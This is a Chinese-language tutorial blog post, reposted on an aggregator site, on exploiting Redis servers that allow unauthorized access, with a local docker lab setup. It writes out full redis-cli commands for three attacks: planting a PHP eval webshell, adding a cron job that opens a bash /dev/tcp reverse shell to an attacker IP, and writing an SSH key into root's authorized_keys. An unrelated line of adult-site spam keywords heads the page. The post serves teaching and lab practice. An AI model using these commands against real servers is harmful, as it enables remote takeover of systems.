国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

Redis未授權(quán)訪問漏洞引出的漏洞利用方式

這篇具有很好參考價值的文章主要介紹了Redis未授權(quán)訪問漏洞引出的漏洞利用方式。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

redis未授權(quán)訪問漏洞的成因和危害

漏洞定義

redis未授權(quán)訪問漏洞是一個由于redis服務(wù)版本較低其未設(shè)置登錄密碼導(dǎo)致的漏洞,攻擊者可直接利用redis服務(wù)器的ip地址和端口完成redis服務(wù)器的遠程登錄,對目標服務(wù)器完成后續(xù)的控制和利用。

漏洞成因

  1. redis版本為4.x/5.0.5或以前的版本;
  2. redis綁定在0.0.0.0:6379,且沒有進行添加防火墻規(guī)則避免其他非信任來源ip訪問等相關(guān)安全策略,直接暴露在公網(wǎng);
  3. 沒有設(shè)置密碼認證,可以免密碼遠程登錄redis服務(wù)

漏洞危害

  1. 攻擊者可通過redis命令向網(wǎng)站目錄寫入webshell,完成對目標網(wǎng)站服務(wù)器的初步控制;(/var/ww/html)
  2. 攻擊者可以通過redis命令向目標服務(wù)器寫入計劃任務(wù)來反彈shell,完成服務(wù)器的控制;(/var/spool/cron/)
    任務(wù)計劃反彈shell方法僅適用于Centos
    Ubuntu 不能用的原因如下:
    因為默認 redis 寫文件后是 644 權(quán)限,但是 Ubuntu 要求執(zhí)行定時任務(wù)文件 /var/spool/cron/crontabs/<username> 權(quán)限必須是 600 才會執(zhí)行,否則會報錯 (root) INSECURE MODE (mode 0600 expected),而 Centos 的定時任務(wù)文件 /var/spool/cron/<username> 權(quán)限 644 也可以執(zhí)行
  3. 最嚴重的情況,如果redis以root身份運行,攻擊者可以給root賬戶寫入SSH公鑰文件,直接通過SSH登錄受害服務(wù)器。(/root/.ssh)

操作演示

由于我的系統(tǒng)是Ubuntu,并且環(huán)境是用docker搭建的,下面我只演示寫webshell的部分。

環(huán)境搭建

靶機:Ubuntu + LAMP + redis-5.0.4(172.16.70.129)
攻擊機:kali(172.16.70.140)

# 搭建redis5.0.4,同時設(shè)置掛載卷和端口映射,如果不做定時任務(wù)和公鑰的實驗則不需要(-v /var/spool/cron:/var/spool/cron -v /root/.ssh:/root/.ssh)
docker run --name=redis-5 -dit -v /var/www/html:/var/www/html -v /var/spool/cron:/var/spool/cron -v /root/.ssh:/root/.ssh -p 6379:6379 redis:5.0.4
# 搭建LAMP,這里我隨便選了個鏡像,同樣做好掛載卷和端口映射并讓容器在啟動時執(zhí)行(./run.sh)命令
docker run --name=lamp -dit -v /var/www/html:/var/www/html -p 80:80 -p 3306:3306 mattrayner/lamp /bin/bash -c "./run.sh"
# 如果需要對redis進行操作,裝個redis-tools就行了
apt install redis-tools

redis未授權(quán)訪問漏洞利用,redis,數(shù)據(jù)庫,安全

redis未授權(quán)

# 在redis-5.0.5以下的版本,安裝成功后默認情況下可以直接進行訪問
redis-cli -h 172.16.70.129

redis未授權(quán)訪問漏洞利用,redis,數(shù)據(jù)庫,安全

通過redis未授權(quán)寫入webshell

# 連接
redis-cli -h 172.16.70.129
# 設(shè)置存儲路徑
config set dir /var/www/html
# 設(shè)置存儲文件名
config set dbfilename shell.php
# 創(chuàng)建記錄  [shell => "\n\n<?php @eval($_REQUEST['cmd']);?>\n\n"]
set shell "\n\n<?php @eval($_REQUEST['cmd']);?>\n\n"
# 保存到磁盤		保存時可能會報錯,原因是/var/www/html沒有寫入權(quán)限
# chmod 777 /var/www/html 一下就好了
save

redis未授權(quán)訪問漏洞利用,redis,數(shù)據(jù)庫,安全

通過redis未授權(quán)寫入計劃任務(wù)反彈shell

# 在攻擊機上監(jiān)聽某端口
nc -lvnp 4444
# 連接靶機redis
redis-cli -h 172.16.70.129
# 設(shè)置存儲路徑
config set dir /var/spool/cron/
# 設(shè)置存儲文件名
config set dbfilename root
# 創(chuàng)建記錄
set xx "\n\n* * * * * bash -i >& /dev/tcp/172.16.70.140/4444 0>&1\n\n"
# 保存到磁盤
save

通過redis未授權(quán)實現(xiàn)ssh-keygen 公鑰登錄服務(wù)器

# 在攻擊機上創(chuàng)建公鑰文件
ssh-keygen -t rsa
# 重新生成一個key文件用于寫入redis
(echo -e "\n\n";cat /home/kali/.ssh/id_rsa.pub;echo -e "\n\n") > key
# 將重新設(shè)置的文件寫入redis,鍵名是key,值內(nèi)為公鑰
cat key | redis-cli -h 172.16.70.129 -x set key
# 設(shè)置存儲路徑(如果設(shè)置失敗,說明redis不是root權(quán)限)
config set dir /root/.ssh/
# 設(shè)置存儲文件名(公鑰存放在/root/.ssh/authorized_keys可以實現(xiàn)ssh免密登錄)
config set dbfilename authorized_keys
# 保存到磁盤
save

redis未授權(quán)訪問漏洞利用,redis,數(shù)據(jù)庫,安全

參考資料

[1]: Docker 入門指南:如何在 Ubuntu 上安裝和使用 Docker
[2]: Redis攻防(未授權(quán)訪問、利用redis寫入webshell、任務(wù)計劃反彈、Shellssh-keygen 公鑰登錄服務(wù)器、利用主從復(fù)制RCE)
[3]: edis問題緩存無法寫入到本地磁盤文章來源地址http://www.zghlxwxcb.cn/news/detail-623187.html

到了這里,關(guān)于Redis未授權(quán)訪問漏洞引出的漏洞利用方式的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Redis未授權(quán)訪問漏洞搭建復(fù)現(xiàn)

    Redis未授權(quán)訪問漏洞搭建復(fù)現(xiàn)

    今天我們來學(xué)習(xí)一下什么是Redis未授權(quán)訪問漏洞,以及各種利用方法。 文章目錄 一、 什么是Redis未授權(quán)訪問漏洞 二、 Redis環(huán)境搭建 三、漏洞利用 四、漏洞總結(jié) 五、漏洞防護 ??????? ?Redis因配置不當可以導(dǎo)致未授權(quán)訪問,被攻擊者惡意利用。當前流行的針對Redis未授權(quán)訪

    2024年02月06日
    瀏覽(21)
  • Redis未授權(quán)訪問漏洞(一)先導(dǎo)篇

    Redis未授權(quán)訪問漏洞(一)先導(dǎo)篇

    Redis默認情況下,會綁定在0.0.0.0:6379,如果沒有進行采用相關(guān)的策略,比如添加防火墻規(guī)則避免其他非信任來源ip訪問等,這樣將會將Redis服務(wù)暴露到公網(wǎng)上。 如果在沒有設(shè)置密碼認證(一般為空)的情況下,會導(dǎo)致任意用戶在可以訪問目標服務(wù)器的情況下未授權(quán)訪問 Redis以及

    2024年02月15日
    瀏覽(16)
  • Redis未授權(quán)漏洞復(fù)現(xiàn)及利用(window,linux)

    Redis未授權(quán)漏洞復(fù)現(xiàn)及利用(window,linux)

    目錄 1.了解redis 2.redis漏洞原理 3.redis漏洞復(fù)現(xiàn) 3.1 安裝redis 3.1.1 Linux安裝redis ?3.1.2 windows安裝redis 4.redis漏洞利用 4.1利用redis漏洞寫webshell 4.1.1利用前提 4.1.2上傳webshell 4.2利用redis漏洞ssh密鑰連接 4.2.1 ssh密鑰連接 4.2.2 利用前提 4.2.3 客戶端生成密鑰 ?4.2.4注意 4.3利用crontab反彈sh

    2023年04月08日
    瀏覽(20)
  • Web安全:Redis 未授權(quán)訪問漏洞 測試.

    Web安全:Redis 未授權(quán)訪問漏洞 測試.

    Redis 默認情況下綁定在 6379 端口,然后如果沒有進行添加防火墻規(guī)則避免其他非信任來源 IP?訪問等相關(guān)安全策略,直接暴露在公網(wǎng)上。然后再沒有設(shè)置密碼或者設(shè)置了弱密碼,因此導(dǎo)致此漏洞的產(chǎn)生. Redis 未授權(quán)訪問漏洞的 危害: Redis 未授權(quán)訪問漏洞 測試: 第一步:使用

    2024年02月11日
    瀏覽(27)
  • 【vulhub漏洞復(fù)現(xiàn)】redis 4-unacc 未授權(quán)訪問漏洞

    【vulhub漏洞復(fù)現(xiàn)】redis 4-unacc 未授權(quán)訪問漏洞

    影響版本 Redis 2.x,3.x,4.x,5.x Redis默認情況下,會綁定在0.0.0.0:6379(在redis3.2之后,redis增加了protected-mode,在這個模式下,非綁定IP或者沒有配置密碼訪問時都會報錯),如果沒有進行采用相關(guān)的策略,比如添加防火墻規(guī)則避免其他非信任來源ip訪問等等,這樣將會將Redis服務(wù)暴

    2023年04月25日
    瀏覽(16)
  • 第55天:服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysql&未授權(quán)訪問&RCE

    第55天:服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysql&未授權(quán)訪問&RCE

    思維導(dǎo)圖: 常見服務(wù)的安全測試: 服務(wù)安全流程: 案例一:Mysql-未授權(quán)訪問-CVE-2012-2122 利用 案例二: Hadoop-未授權(quán)訪問-內(nèi)置配合命令執(zhí)行 RCE 案例三:Redis-未授權(quán)訪問-Webshell任務(wù)密匙RCE 等 寫入webshell ?寫入計劃任務(wù)反彈shell ssh密鑰鏈接 ?編輯利用自動化腳本去getshell redi

    2024年04月27日
    瀏覽(25)
  • 網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)

    網(wǎng)絡(luò)安全全棧培訓(xùn)筆記(55-服務(wù)攻防-數(shù)據(jù)庫安全&Redis&Hadoop&Mysqla&未授權(quán)訪問&RCE)

    知識點: 1、服務(wù)攻防數(shù)據(jù)庫類型安全 2、RedisHadoopMysql安全 3、Mysql-CVE-2012-2122漏洞 4、Hadoop-配置不當未授權(quán)三重奏RCE漏洞 3、Redis-配置不當未授權(quán)三重奏RCE兩漏洞 #章節(jié)內(nèi)容: 常見服務(wù)應(yīng)用的安全測試: 1、配置不當-未授權(quán)訪問 2、安全機制特定安全漏洞 3、安全機制弱口令爆

    2024年01月23日
    瀏覽(30)
  • Redis未授權(quán)漏洞復(fù)現(xiàn)

    Redis未授權(quán)漏洞復(fù)現(xiàn)

    目錄 Redis 漏洞的產(chǎn)生條件及利用 Redis環(huán)境搭建 漏洞復(fù)現(xiàn) 利用Redis寫入Webshell 利用Redis寫入SSH公鑰 利用Redis寫入計劃任務(wù) Redis安全防護 redis(remote dictionary server)是一個key-value存儲系統(tǒng),是跨平臺的非關(guān)系型數(shù)據(jù)庫。 redis默認情況下,會綁定在0.0.0.0:6379,如果沒有采用相關(guān)的安

    2024年04月08日
    瀏覽(22)
  • redis未授權(quán)漏洞

    Redis 默認情況下會綁定在 0.0.0.0:6379,這樣將會將 Redis 服務(wù)暴露到公網(wǎng)上,如果在沒有開啟認證的情況下,可以導(dǎo)致任意用戶在可以訪問目標服務(wù)器的情況下未授權(quán)訪問Redis以及讀取 Redis的數(shù)據(jù) 1)通過 Redis的INFO 命令,可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息,為攻擊者的后續(xù)滲

    2024年02月07日
    瀏覽(14)
  • Jboss歷史漏洞利用 - JMX Console 未授權(quán)訪問漏洞

    Jboss歷史漏洞利用 - JMX Console 未授權(quán)訪問漏洞

    docker搭建操作指南 進行訪問,出現(xiàn)以下界面即可搭建成功 Jboss的webUI界面 http://ip:port/jmx-console 未授權(quán)訪問(或默認密碼 admin/admin ),可導(dǎo)致JBoss的部署管理的信息泄露,攻擊者也可以直接上傳木馬獲取 webshell 訪問 如果可以直接訪問或者通過默認賬號密碼登錄則存在對應(yīng)漏洞 找

    2024年02月13日
    瀏覽(19)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包